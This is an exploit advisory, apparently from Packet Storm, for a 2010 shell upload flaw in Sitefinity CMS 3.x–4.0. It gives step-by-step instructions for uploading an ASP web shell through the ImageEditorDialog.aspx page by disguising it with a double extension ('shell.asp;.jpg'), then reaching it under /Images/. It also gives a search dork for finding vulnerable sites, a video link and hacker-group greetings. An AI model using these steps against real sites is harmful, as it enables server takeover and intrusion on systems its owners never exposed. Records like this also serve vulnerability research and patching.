Sitefinity CMS suffers from a shell upload vulnerability.
7ad8218caad9032981ca6bb9e20d51013e7357e78dc1cfa0354df51b28d99a36=============================================================
Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
=============================================================
###################################################
#
# Exploit Title: Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
# DDate: 16/11/2010
# Author: Net.Edit0r
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2 2.0)
# dork : "Sitefinity: Login"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
#
####################################################
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
first go to # http://site.com/sitefinity/
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/Images/[shell]
Video : http://net-edit0r.persiangig.com/Film/0day.rar
#######################################################
Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d ,Raiden , m4hd1 ,P0W3RFU7
BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed